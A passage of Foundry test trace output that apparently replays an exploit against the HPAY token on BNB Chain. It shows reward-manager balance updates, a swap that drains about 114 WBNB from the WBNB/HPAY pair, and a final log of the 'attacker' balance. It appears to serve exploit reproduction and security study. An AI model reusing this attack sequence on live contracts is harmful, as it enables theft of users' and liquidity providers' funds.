    │   │   │   │   ├─ [8372] HPAY_RewardManager::notifyBalanceUpdate(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, 1188774321402739570559930 [1.188e24])
    │   │   │   │   │   ├─ [7675] HPAY_RewardManager_Impl::notifyBalanceUpdate(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, 1188774321402739570559930 [1.188e24]) [delegatecall]
    │   │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 594387160701369785279965 [5.943e23]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [63336] HPAY_RewardManager::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 657164623521222375210976 [6.571e23])
    │   │   │   │   │   ├─ [62639] HPAY_RewardManager_Impl::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 657164623521222375210976 [6.571e23]) [delegatecall]
    │   │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1251551784222592160490941 [1.251e24]
    │   │   │   │   │   │   ├─ [633] HPAY_Fund::pendingRewards() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000088900bc094dadd899
    │   │   │   │   │   │   ├─ emit Deposit(dst: 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, wad: 1251551784222592160490941 [1.251e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 207: 0x0000000000000000000000000000000000000000000001ea5d13e60119a29a32 → 0x00000000000000000000000000000000000000000000022e08a477ebbf7a10c1
    │   │   │   │   │   │   │   @ 201: 0x000000000000000000000000000000000000000000077448c0968cb9d52a9aa2 → 0x000000000000000000000000000000000000000000087d4f82ae15a0ebd6805f
    │   │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b4: 1000 → 1138
    │   │   │   │   │   │   │   @ 0x332a4bb05961ce091c7be1e4d68c703e913003555409f51da9629e21cfef5fc2: 0x00000000000000000000000000000000000000000000000000000000634a04f7 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   │   │   │   │   @ 0xcf90eda31f693fc40229bfe6642109b69c37b9c784c308df6f017a34e40129c3: 0 → 0x000000000000000000000000000000000000000000010906c21788e716abe5bd
    │   │   │   │   │   │   │   @ 0xcf90eda31f693fc40229bfe6642109b69c37b9c784c308df6f017a34e40129c4: 42 → 45
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3687595841f4b9beca5fcfa2d7cea9359ce2f3a5e79dbde2f20e23aca7cc53da: 0x000000000000000000000000000000000000000000008b28f73335271e477fe0 → 0x000000000000000000000000000000000000000000010906c21788e716abe5bd
    │   │   │   │   │   @ 0x332a4bb05961ce091c7be1e4d68c703e913003555409f51da9629e21cfef5fc2: 0x00000000000000000000000000000000000000000000000000000000634a04f7 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   │   │   @ 0xe213d355ca1b1aab7c23f8dda28a0af8b7d0205f7953214cfc9568fa8509b58a: 0x00000000000000000000000000000000000000000000fbbb95c8a77ff0c8cbba → 0x000000000000000000000000000000000000000000007dddcae453bff86465dd
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0) [staticcall]
    │   │   │   │   └─ ← [Return] 594387160701369785279965 [5.943e23]
    │   │   │   ├─ [61016] HPAY_TOKEN::transfer(0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c, 594387160701369785279965 [5.943e23])
    │   │   │   │   ├─ emit Transfer(from: 0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, to: 0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c, value: 594387160701369785279965 [5.943e23])
    │   │   │   │   ├─ [4372] HPAY_RewardManager::notifyBalanceUpdate(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, 594387160701369785279965 [5.943e23])
    │   │   │   │   │   ├─ [3675] HPAY_RewardManager_Impl::notifyBalanceUpdate(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, 594387160701369785279965 [5.943e23]) [delegatecall]
    │   │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [43813] HPAY_RewardManager::notifyBalanceUpdate(0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c, 1465349323423145263642183 [1.465e24])
    │   │   │   │   │   ├─ [43116] HPAY_RewardManager_Impl::notifyBalanceUpdate(0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c, 1465349323423145263642183 [1.465e24]) [delegatecall]
    │   │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2059736484124515048922148 [2.059e24]
    │   │   │   │   │   │   ├─ [633] HPAY_Fund::pendingRewards() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000088900bc094dadd899
    │   │   │   │   │   │   ├─ emit Deposit(dst: 0xc405c35ceC783C2ccc5430Dd13C2dbd18adCCd1c, wad: 594387160701369785279965 [5.943e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 203: 0x000000000000000000000000000000000000000000000004dab0c8092cbc70cf → 0x000000000000000000000000000000000000000000000004efce489ba2cb70fa
    │   │   │   │   │   │   │   @ 0x8e2e2deb52ff76504f06bda8dd0815a9eeeca115955cdb6ba464cb3ee3379520: 0x00000000000000000000000000000000000000000001364cbef98be54a883647 → 0x00000000000000000000000000000000000000000001b42a89dddfa542ec9c24
    │   │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b4: 1138 → 1204
    │   │   │   │   │   │   │   @ 0x8e2e2deb52ff76504f06bda8dd0815a9eeeca115955cdb6ba464cb3ee3379523: 0x00000000000000000000000000000000000000000000000097c3d9deef07fa65 → 0x000000000000000000000000000000000000000000000000ace15a716516fa90
    │   │   │   │   │   │   │   @ 207: 0x00000000000000000000000000000000000000000000022e08a477ebbf7a10c1 → 0x00000000000000000000000000000000000000000000024e65d359887e18c3e4
    │   │   │   │   │   │   │   @ 0x8e2e2deb52ff76504f06bda8dd0815a9eeeca115955cdb6ba464cb3ee3379521: 44 → 45
    │   │   │   │   │   │   │   @ 201: 0x000000000000000000000000000000000000000000087d4f82ae15a0ebd6805f → 0x00000000000000000000000000000000000000000008fb2d4d926960e43ae63c
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 207: 0x00000000000000000000000000000000000000000000022e08a477ebbf7a10c1 → 0x00000000000000000000000000000000000000000000024e65d359887e18c3e4
    │   │   │   │   │   @ 0x53c55eca59f6596bc8b6d6fe69e4d495f6162bc4e21fd7c38a808d57c37e93e9: 0x00000000000000000000000000000000000000000001364cbef98be54a883647 → 0x00000000000000000000000000000000000000000001b42a89dddfa542ec9c24
    │   │   │   │   │   @ 0xe213d355ca1b1aab7c23f8dda28a0af8b7d0205f7953214cfc9568fa8509b58a: 0x000000000000000000000000000000000000000000007dddcae453bff86465dd → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x332a4bb05961ce091c7be1e4d68c703e913003555409f51da9629e21cfef5fc2: 0x00000000000000000000000000000000000000000000000000000000634a04f7 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640534639457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x0000000000000000000000000000000000000000001851b1318cbc1717000000 → 0
    │   │   │   @ 207: 0x000000000000000000000000000000000000000000000829edfa2ee6fe272fe6 → 0x00000000000000000000000000000000000000000000024e65d359887e18c3e4
    │   │   │   @ 0xe213d355ca1b1aab7c23f8dda28a0af8b7d0205f7953214cfc9568fa8509b58a: 0 → 0x00000000000000000000000000000000000000000000fbbb95c8a77ff0c8cbba
    │   │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe7ae4ece7343e8e8ffffff
    │   │   │   @ 0x720a2172ed78d018f7578427b4f473b4a1388e74230555c3da70d2645d7b7d9e: 0x0000000000000000000000000000000000000000000002b47f52628941c8cbba → 0
    │   │   │   @ 0x1dfab03f91cc29d4c551de7650849c90584dcfb71669d0c10d77d4051c02c5f7: 0x0000000000000000000000000000000000000000001fa942a526e6337383a3d4 → 0x0000000000000000000000000000000000000000003701ecc03d5d53db83a3d4
    │   │   └─ ← [Return] true
    │   ├─ [534] WBNB_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] WBNB_HPAY_PAIR::getReserves() [staticcall]
    │   │   └─ ← [Return] 270011697890923210138 [2.7e20], 38276009729219513316254676 [3.827e25], 1666090427 [1.666e9]
    │   ├─ [930] HPAY_TOKEN::balanceOf(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0]) [staticcall]
    │   │   └─ ← [Return] 66500009729219513316254676 [6.65e25]
    │   ├─ [62738] WBNB_HPAY_PAIR::swap(114433555702427267533 [1.144e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [27962] WBNB_TOKEN::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 114433555702427267533 [1.144e20])
    │   │   │   ├─ emit Transfer(from: WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 114433555702427267533 [1.144e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000063415a89dcc0db1cd
    │   │   │   │   @ 0xef1ade792815c13489a853445f5dd02be85231ee4d5c056e0fe672f272113e9a: 0x00000000000000000000000000000000000000000000000ea32a40a60491659a → 0x0000000000000000000000000000000000000000000000086f1498083883b3cd
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB_TOKEN::balanceOf(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0]) [staticcall]
    │   │   │   └─ ← [Return] 155578142188495942605 [1.555e20]
    │   │   ├─ [930] HPAY_TOKEN::balanceOf(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0]) [staticcall]
    │   │   │   └─ ← [Return] 66500009729219513316254676 [6.65e25]
    │   │   ├─ emit Sync(reserve0: 155578142188495942605 [1.555e20], reserve1: 66500009729219513316254676 [6.65e25])
    │   │   ├─ emit Swap(sender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 28224000000000000000000000 [2.822e25], amount0Out: 114433555702427267533 [1.144e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x000000000000000000000000000000000113757c02207873754306a4b12939c7 → 0x0000000000000000000000000000000001137636c85bdd51fea57555d2538857
    │   │   │   @ 8: 0x634e85bb0000001fa942a526e6337383a3d400000000000ea32a40a60491659a → 0x634e874f0000003701ecc03d5d53db83a3d40000000000086f1498083883b3cd
    │   │   │   @ 9: 0x00000000000000000000000001c062ae1d078320f0ce482d086ebcbaf5338907 → 0x00000000000000000000000001c06617fb11dd46d047f5a135b20fb8d1cc3467
    │   │   └─ ← [Stop]
    │   ├─ [534] WBNB_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 114433555702427267533 [1.144e20]
    │   └─ ← [Stop]
    ├─ [534] WBNB_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 114433555702427267533 [1.144e20]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 114433555702427267533 [1.144e20], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 49.04s (47.10s CPU time)

Ran 2 test suites in 50.35s (50.69s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
